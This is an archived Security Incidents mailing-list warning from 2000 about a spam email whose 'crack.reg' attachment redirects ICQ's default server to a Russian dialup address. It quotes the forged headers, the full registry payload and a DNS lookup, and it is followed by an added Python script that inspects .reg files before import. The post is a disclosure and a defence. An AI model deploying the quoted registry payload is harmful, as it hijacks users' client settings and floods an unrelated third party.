Security Incidents mailing list archives
Re: CRACK
From: oogali () INTRANOVA NET (Omachonu Ogali)
Date: Thu, 25 May 2000 09:45:31 -0400
Yesterday, an e-mail was sent to a mailing list I'm subscribed to with a
subject of 'CRACK' and an attachment of 'crack.reg'. After looking into it,
you can see that the headers were forged, and the attachment edits your ICQ
preferences in the registry and makes your default server a dialup
victim/client in Russia.

Headers:
-- snip --
Return-Path: <owner-freebsd-jobs () FreeBSD ORG>
Delivered-To: oogali () hydrant intranova net
Received: from intranova.net (blacklisted.intranova.net [209.3.31.70])
        by hydrant.intranova.net (Postfix) with SMTP id 33F73E1368
        for <oogali () hydrant intranova net>; Thu, 25 May 2000 00:12:21 -0400
Received: (qmail 14575 invoked by uid 1001); 24 May 2000 21:03:15 -0000
Delivered-To: oogali () intranova net
Received: (qmail 14567 invoked from network); 24 May 2000 21:03:14 -0000
Received: from hub.freebsd.org (204.216.27.18)
        by blacklisted.intranova.net with SMTP; 24 May 2000 21:03:14 -0000
Received: by hub.freebsd.org (Postfix, from userid 538)
        id 0698B37B710; Wed, 24 May 2000 14:04:19 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1])
        by hub.freebsd.org (Postfix) with SMTP
        id 004672E8163; Wed, 24 May 2000 14:04:18 -0700 (PDT)
        (envelope-from owner-freebsd-jobs)
Received: by hub.freebsd.org (bulk_mailer v1.12); Wed, 24 May 2000 14:04:18 -0700
Delivered-To: freebsd-jobs () freebsd org
Received: from demos.su (mx.demos.su [194.87.0.32])
        by hub.freebsd.org (Postfix) with ESMTP id EC47637BD6F
        for <jobs () freebsd org>; Wed, 24 May 2000 14:04:12 -0700 (PDT)
        (envelope-from ppbsereb%geisteskrank.demos.su () sinbin demos su)
Received: from sinbin.demos.su ([194.87.5.31] verified)
        by demos.su (CommuniGate Pro SMTP 3.2.4) with SMTP id 6364870
        for jobs () freebsd org; Thu, 25 May 2000 01:04:10 +0400
Received: from geisteskrank.demos.su by sinbin.demos.su with ESMTP
        id BAA44176; (8.6.12/D) Thu, 25 May 2000 01:03:03 +0400
Received: from rcomputer by geisteskrank.demos.su with SMTP
        id BAA61511; (8.9.3/D) Thu, 25 May 2000 01:02:32 +0400 (MSD)
Message-Id: <200005242102.BAA61511 () geisteskrank demos su>
From: "zulti () hotmail com" <zulti () hotmail com>
To: <jobs () freebsd org>
Subject: CRACK
Date: Thu, 25 May 2000 01:01:38 ^? ()
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="----=_NextPart_000_01F6_01BF2E09.23F97E80"
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: 'WE' Group Spamer
Sender: owner-freebsd-jobs () FreeBSD ORG
X-Loop: FreeBSD.org
Precedence: bulk
-- snip --

Attachment:
-- snip --
REGEDIT4

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\DefaultPrefs]
"Default Server Port"=dword:00001446
"Default Server Host"="195.133.10.234"
-- snip --

-- snip --
Server:  localhost.intranova.net
Address:  127.0.0.1

Name:    234.10.133.195.dynamic.dialup.ru
Address:  195.133.10.234
-- snip --

Once again, the problem here is people opening attachments without taking a
look at them. Thank God this isn't a self-replicating e-mail, but it presents
a Denial-of-Service attack against this Russian dialup.

In conclusion...heads up!

--
+-------------------------------------------------------------------------+
| Omachonu Ogali                                  oogali () intranova net |
| Intranova Networking Group                 http://tribune.intranova.net |
| PGP Key ID: 0xBFE60839                                                  |
| PGP Fingerprint: C8 51 14 FD 2A 87 53 D1 E3 AA 12 12 01 93 BD 34        |
+-------------------------------------------------------------------------+
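
Taking a look at a .reg attachment before importing it, as the post urges, can be scripted. The following is an added example, not part of the original post: a small reader for the REGEDIT4 text format that lists every value the quoted crack.reg would write and decodes dword data from hexadecimal. The function names are illustrative, and hex: data and line continuations are reported undecoded.

```python
import re

# The attachment exactly as quoted in the post (REGEDIT4 text format).
CRACK_REG = r'''REGEDIT4

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\DefaultPrefs]
"Default Server Port"=dword:00001446
"Default Server Host"="195.133.10.234"
'''

KEY_RE = re.compile(r'^\[(-?)(.+)\]$')
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")\s*=\s*(.*)$')


def unescape(quoted):
    """Strip the surrounding quotes and undo .reg backslash escapes."""
    return re.sub(r'\\(.)', r'\1', quoted[1:-1])


def decode(raw):
    """Turn the right-hand side of a value line into (type, value)."""
    if raw == '-':
        return ('delete', None)
    if raw.lower().startswith('dword:'):
        return ('dword', int(raw[6:], 16))      # dword data is hexadecimal
    if len(raw) >= 2 and raw[0] == raw[-1] == '"':
        return ('string', unescape(raw))
    return ('other', raw)                        # hex:, hex(2): ... left undecoded


def parse_reg(text):
    """Return (key, name, type, value) for every value the file would write."""
    changes, key = [], None
    for line in (l.strip() for l in text.splitlines()):
        m = KEY_RE.match(line)
        if m:                                    # "[-KEY]" deletes a whole key
            key = ('DELETE ' if m.group(1) else '') + m.group(2)
            continue
        m = VALUE_RE.match(line)
        if m and key:
            name = '(Default)' if m.group(1) == '@' else unescape(m.group(1))
            changes.append((key, name) + decode(m.group(2).strip()))
    return changes


if __name__ == '__main__':
    for key, name, kind, value in parse_reg(CRACK_REG):
        print(f'{key}\n    {name} = {value!r} ({kind})')
```

For the quoted attachment this reports "Default Server Port" as 5190 (0x1446) and "Default Server Host" as the string 195.133.10.234, both under the ICQ DefaultPrefs key.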